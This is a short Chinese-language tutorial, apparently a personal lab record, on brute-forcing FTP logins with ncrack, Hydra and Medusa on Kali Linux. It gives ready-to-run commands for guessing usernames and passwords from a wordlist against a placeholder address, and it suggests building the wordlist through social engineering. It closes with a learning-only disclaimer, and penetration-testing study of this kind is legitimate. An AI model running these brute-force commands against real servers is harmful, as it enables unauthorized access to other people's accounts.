ftp密码破解——ncrack、hydra、medusa

ftp密码破解

                                        ——ncrack、Hydra、medusa

        下面和大家分享三个kali linux中的密码破解工具（ncrack，hydra、medusa），本文主要介绍一下一些关于ftp破解过程中的简单的命令。

        首先，我们可以通过直接在终端用ncrack得到ncrack版本以及相关命令的解释，如图

直接上手操作，在我们不知道用户名以及密码的情况下爆破：

我们需要用字典生成工具生成一个字典，放在桌面上备用。

        命令：ncrack  –U  /root/桌面/pass.txt  –P  /root/桌面/pass.txt  ftp://000.000.000.000

       解释：-U为用户名，后面的/root/桌面/pass.txt 为爆破字典所在位置，同样-P为密码，后面的/root/桌面/pass.txt 也为爆破字典所在位置。只要你的字典足够强大，那么就是时间问题了。在组成字典的时候，要综合运用社工等方法形成一套适合的字典。ftp后面的000.000.000.000为ftp的地址，根据自己实际情况来改动。

在我们，知道用户名的情况下爆破：

       ncrack  --user  用户名  -P  /root/桌面/pass.txt  ftp://000.000.000.000

        解释同上，但要注意--user是两道杠，并且user是小写，kali linux大小写敏感。

用Hydra再来进行一遍一样的实验：

在不知用户名以及密码的情况下，采用自己生成的密码爆破：

        命令：hydra  ftp://000.000.000.000  -L  /root/桌面/pass.txt  -P  /root/桌面/pass.txt

在已知用户名的情况下爆破：

       命令：hydra  ftp://000.000.000.000  -l  用户名  -P  /root/桌面/pass.txt

注意大小写，小写的l，大写的P

      最后，来介绍一下medusa的操作方法

操作命令：

medusa

               -h target （ftp的地址）

               -H many targets

               -u 已知用户名

               -U 用户名的字典文件

               -p 已知密码

               -P 密码的字典

               -M 模式 ftp http telnet ssh

实战命令：

已知用户名爆破密码：

medusa  -h  000.000.000.000 -u 用户名 –P  /root/桌面/pass.txt  -M ftp

未知用户名爆破密码：

medusa -h  000.000.000.000  -U  /root/桌面/pass.txt –P  /root/桌面/pass.txt  -M ftp

       个人来说，比较喜欢hydra的界面，用户名和密码都能很清晰的显示出来。好了，至此两个工具的实验介绍就告一段落了，能力有限，只是写出了爆破时所需要的命令以及实验过程，作为自己的实验记录，欢迎各路大牛指正。本文仅用于学习交流，请勿用于违法操作。